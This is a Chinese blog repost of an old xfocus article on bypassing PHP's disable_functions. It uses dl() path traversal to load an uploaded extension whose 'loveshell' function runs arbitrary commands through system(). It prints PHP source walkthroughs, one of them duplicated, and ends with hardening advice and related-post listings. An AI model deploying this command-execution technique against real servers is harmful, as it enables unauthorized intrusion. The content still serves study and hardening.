dl函数不可使用php,[PHP]利用dl函数突破disable_functions执行命令

最新推荐文章于 2021-03-28 10:05:12 发布
最新推荐文章于 2021-03-28 10:05:12 发布
阅读量303 收藏
点赞数
文章标签: dl函数不可使用php

FROM: xfocus.net

创建时间:2007-04-19

文章提交:T_Torchidy (jnchaha_at_163.com)

PHP 是一款功能强大应用广泛的脚本语言,很大一部分网站都是使用PHP架构的。因为其提供了强大的文件操作功能和与系统交互的功能,所以大部分的服务器都对 PHP做了严格的限制,包括使用open_basedir限制可以操作的目录以及使用disable_functions限制程序使用一些可以直接执行系统命令的函数如system,exec,passthru,shell_exec,proc_open等等。但是如果服务器没有对dl()函数做限制,一样可以利用dl()函数饶过这些限制。

dl()函数允许在php脚本里动态加载php模块,默认是加载extension_dir目录里的扩展,该选项是PHP_INI_SYSTEM 范围可修改的,只能在php.ini或者apache主配置文件里修改。当然,你也可以通过enable_dl选项来关闭动态加载功能,而这个选项默认为 On的,事实上也很少人注意到这个。dl()函数在设计时存在安全漏洞,可以用../这种目录遍历的方式指定加载任何一个目录里的so等扩展文件, extension_dir限制可以被随意饶过。所以我们可以上传自己的so文件,并且用dl函数加载这个so文件然后利用so文件里的函数执行其他操作,包括系统命令。

复制内容到剪贴板

代码:PHP_FUNCTION(dl)

{

pval **file;

#ifdef ZTS

if ((strncmp(sapi_module.name, "cgi", 3)!=0) &&

(strcmp(sapi_module.name, "cli")!=0) &&

(strncmp(sapi_module.name, "embed", 5)!=0)) {

php_error_docref(NULL TSRMLS_CC, E_WARNING, "Not supported in multithreaded Web servers - use extension statements in your php.ini");

RETURN_FALSE;

}            //验证是否可以使用dl函数,在多线程web服务器里是禁止的

#endif

/* obtain arguments */

if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &file) == FAILURE) {

WRONG_PARAM_COUNT;

}

convert_to_string_ex(file);       //取得参数

if (!PG(enable_dl)) {

php_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extentions aren't enabled");//验证是否enable_dl,默认为on

} else if (PG(safe_mode)) {

php_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extensions aren't allowed when running in Safe Mode");//验证是否safe_mode打开

} else {

php_dl(*file, MODULE_TEMPORARY, return_value TSRMLS_CC);  //开始调用加载

EG(full_tables_cleanup) = 1;

}下面是开始处理模块的加载

复制内容到剪贴板

代码:void php_dl(pval *file, int type, pval *return_value TSRMLS_DC)

{

void *handle;

char *libpath;

zend_module_entry *module_entry, *tmp;

zend_module_entry *(*get_module)(void);

int error_type;

char *extension_dir;            //定义一些变量

if (type==MODULE_PERSISTENT) {

/* Use the configuration hash directly, the INI mechanism is not yet initialized */

if (cfg_get_string("extension_dir", &extension_dir)==FAILURE) {

extension_dir = PHP_EXTENSION_DIR;

}

} else {

extension_dir = PG(extension_dir);

}                        //取得php.ini里的设置也就是extension_dir的目录

if (type==MODULE_TEMPORARY) {

error_type = E_WARNING;

} else {

error_type = E_CORE_WARNING;

}

if (extension_dir && extension_dir[0]){

int extension_dir_len = strlen(extension_dir);

libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);

if (IS_SLASH(extension_dir[extension_dir_len-1])) {

sprintf(libpath, "%s%s", extension_dir, Z_STRVAL_P(file)); /* SAFE */

} else {

sprintf(libpath, "%s%c%s", extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */

}                    //构造最终的so文件的位置,只是简单的附加,并没有对传入的参数做任何检查,包括open_basedir等

} else {

libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));

}

/* load dynamic symbol */

handle = DL_LOAD(libpath);            //开始真正的调用了看到了吧,我们可以调用任意的so了哦!下一步就是编写自己的so模块,并且调用他。按照官方提供的模块编写方法,我写了个很简单的,主要的导出函数loveshell如下:

复制内容到剪贴板

代码:PHP_FUNCTION(loveshell)

{

char *command;

int command_len;

if (ZEND_NUM_ARGS() != 1 || zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,"s", &command, &command_len) == FAILURE) {

WRONG_PARAM_COUNT;

}

system(command);

zend_printf("I recieve %s",command);

}注意由于php4和php5的结构不一样,所以如果想要能顺利调用扩展,那么在php4环境下就要将上面的代码放到php4环境下编译,php5的就要在php5环境下编译。我们将编写好的扩展上传到服务器,就可以利用下面的代码执行命令了:

复制内容到剪贴板

代码:所以如果想保证服务器的安全,请将这个函数加到disable_functions里或者将安全模式打开吧,在安全模式下dl函数是无条件禁止的!:)

--------------------next---------------------

复制内容到剪贴板

代码:void php_dl(pval *file, int type, pval *return_value TSRMLS_DC)

{

void *handle;

char *libpath;

zend_module_entry *module_entry, *tmp;

zend_module_entry *(*get_module)(void);

int error_type;

char *extension_dir;            //定义一些变量

if (type==MODULE_PERSISTENT) {

/* Use the configuration hash directly, the INI mechanism is not yet initialized */

if (cfg_get_string("extension_dir", &extension_dir)==FAILURE) {

extension_dir = PHP_EXTENSION_DIR;

}

} else {

extension_dir = PG(extension_dir);

}                        //取得php.ini里的设置也就是extension_dir的目录

if (type==MODULE_TEMPORARY) {

error_type = E_WARNING;

} else {

error_type = E_CORE_WARNING;

}

if (extension_dir && extension_dir[0]){

int extension_dir_len = strlen(extension_dir);

libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);

if (IS_SLASH(extension_dir[extension_dir_len-1])) {

sprintf(libpath, "%s%s", extension_dir, Z_STRVAL_P(file)); /* SAFE */

} else {

sprintf(libpath, "%s%c%s", extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */

}                    //构造最终的so文件的位置,只是简单的附加,并没有对传入的参数做任何检查,包括open_basedir等

} else {

libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));

}

/* load dynamic symbol */

handle = DL_LOAD(libpath);            //开始真正的调用了

--------------------next---------------------

邓danie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php dl函数找不到,phpdl函数用法实例_PHP - strtoupper
weixin_42674361的博客
03-20 196
...网上流传着这么一个腾讯笔试题: PHP的strtolower()和strtoupper()函数在安装非中文系统的服务器下可能会导致将汉字转换为乱码,请写两个替代的函数实现兼容Unicode文字的字符串大小写转换。 举个例子,我们直接对中...本文实例讲述了phpdl函数用法。分享给大家供大家参考。具体如下:PHPdl函数官网说明如下:http://www.php.net/manual...
php enable_dl,【安全红队】PHP绕过disable_function限制
weixin_32025789的博客
03-26 933
利用环境变量和系统组件在维护网站时,为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。例如:passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,...
mysql 危险函数禁用_一些需要禁用的PHP危险函数(disable_functions) - 小众知识
weixin_42401178的博客
01-20 799
phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:中passthru()功能描述:允许执行一个外部程序并回显输出,类似于 exec()。危险等级:高exec()功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。危险等级:高system()功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。危险等级:高c...
关于在php.ini中添加extension=php_mysqli.dll指令的说明
12-17
在配置php5时要使用mysql作为数据库,很多人都认为只要在php.ini中添加extension=php_mysql.dll;指令即可,不清楚为什么很多文章都推荐还要添加extension=php_mysqli.dll;指令。 只要查看官方最新php手册便知,上面写到: 下面是内置的扩展库列表:  PHP 5 中(截止到 5.0.4)有以下修改。新增内置:DOM,LibXML,Iconv,SimpleXML,SPL 和SQLite。以下不再内置:MySQL 和 Overload。 原来php5没有内置这些扩展库(当然也可以得出在使用php4时,不需要添加这些指令),至于为什么php5没有不
利用PHP扩展模块突破Disable_functions执行命令
09-13
利用PHP扩展模块突破Disable_functions执行命令
一些需要禁用的PHP危险函数(disable_functions)
12-18
phpinfo() 功能描述:输出 PHP 环境信息以及相关的... 危险等级:高 chroot() 功能描述:可改变当前 PHP 进程的工作根目录,仅当系统支持 CLI 模式 PHP 时才能工作,且该函数不适用于 Windows 系统。 危险等级:高 scan
PHP突破disable_functions常用姿势以及使用Fuzz挖掘含内部系统调用的函数1
08-03
本文将探讨几种常见的绕过`disable_functions`的方法,并介绍如何利用`Fuzz`技术发现包含内部系统调用的函数。 首先,我们知道`disable_functions`是基于黑名单机制,因此如果配置不完整,仍可能存在未被禁用的危险...
php.ini 启用disable_functions提高安全
09-30
如果想保证服务器的安全,请将这个函数加到disable_functions里或者将安全模式打开吧,在安全模式下dl函数是无条件禁止的
dl函数不可使用php,phpdl函数用法实例,dl函数实例_PHP教程
weixin_35743986的博客
03-10 209
phpdl函数用法实例,dl函数实例本文实例讲述了phpdl函数用法。分享给大家供大家参考。具体如下:PHPdl函数官网说明如下:http://www.php.net/manual/en/function.dl.php具体用法示例如下:复制代码 代码如下:// Example loading an extension based on OSif (!extension_loaded('sql...
PHPdl函数
daiyan_csdn的博客
07-13 3333
(PHP 4, PHP 5, PHP 7) dl — 运行时载入一个 PHP 扩展 说明 bool dl ( string $library ) 载入指定参数 library 的 PHP 扩展。 使用 extension_loaded() 来测试指定的扩展是否已经激活。 这既能用于内建的扩展也可以用于动态加载的扩展(既可以通过 php.ini 也可以通过 dl()
dlopen;dlclose;dlsym
xp_super的专栏
11-21 598
Dynamically Loaded (DL) 在读HAL相关源码的时候发现这两个函数  简而言之,共享对象通过dlopen动态打开动态库的加载完成后,返回一个句柄,通过dlsym定位到你需要执行函数指针然后可以在程序中使用   dlopen -- open a dynamically linked library   dlsym -- get the address of a sy
利用dl函数突破disable_functions执行命令
liswa 电脑备忘录
05-10 1699
来自:http://www.xfocus.net/articles/200704/915.html利用dl函数突破disable_functions执行命令创建时间:2007-04-19文章属性:原创文章提交:T_Torchidy (jnchaha_at_163.com)PHP是一款功能强大应用广泛的脚本语言,很大一部分网站都是使用PHP架构的。因为其提供了强大的文件操作功能和与系统交互的
php disable_functions无法禁用,如何使用PHP disable_functions指令禁用功能,以及与安全性的探讨...
weixin_39640573的博客
03-28 645
使用DISABLE_FUNCTIONS命令出于安全原因,您可能要禁用某些PHP功能。例如,当 exec和system函数与未经过滤的输入值一起使用时,这样会造成严重的安全性问题。要禁用功能,请使用文本编辑器修改php.ini文件中的disable_functions命令。该命令采用逗号分隔的列表。例如,要禁用exec和系统功能,请使用以下命令disable_functions = "exec, ...
as_bypass_php_disable_functions-master
最新发布
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有时候我们可能需要在某些情况下调用被禁用的函数,例如一些特殊的需求或者调试目的。这时候,as_bypass_php_disable_functions-master就能帮助我们绕过这些禁用函数的限制。 该项目通过利用PHP的一些特性和漏洞,向PHP进程添加自定义扩展或修改PHP源代码的方式,以实现绕过禁用函数的效果。 使用这个项目需要一定的PHP编程知识和经验。首先,我们需要将项目中的代码部署到服务器上。然后,根据自己的需求,参考项目文档中的说明进行配置。 在项目运行后,我们就可以使用被禁用的函数了。但是需要注意的是,使用这个项目绕过禁用函数可能会带来一些风险和安全隐患。因此,我们应该谨慎使用,并确保代码的安全性。 总之,as_bypass_php_disable_functions-master是一个用于绕过PHP禁用函数的项目,可以帮助我们在特殊情况下调用被禁用的函数。但是使用时需要注意安全性和潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值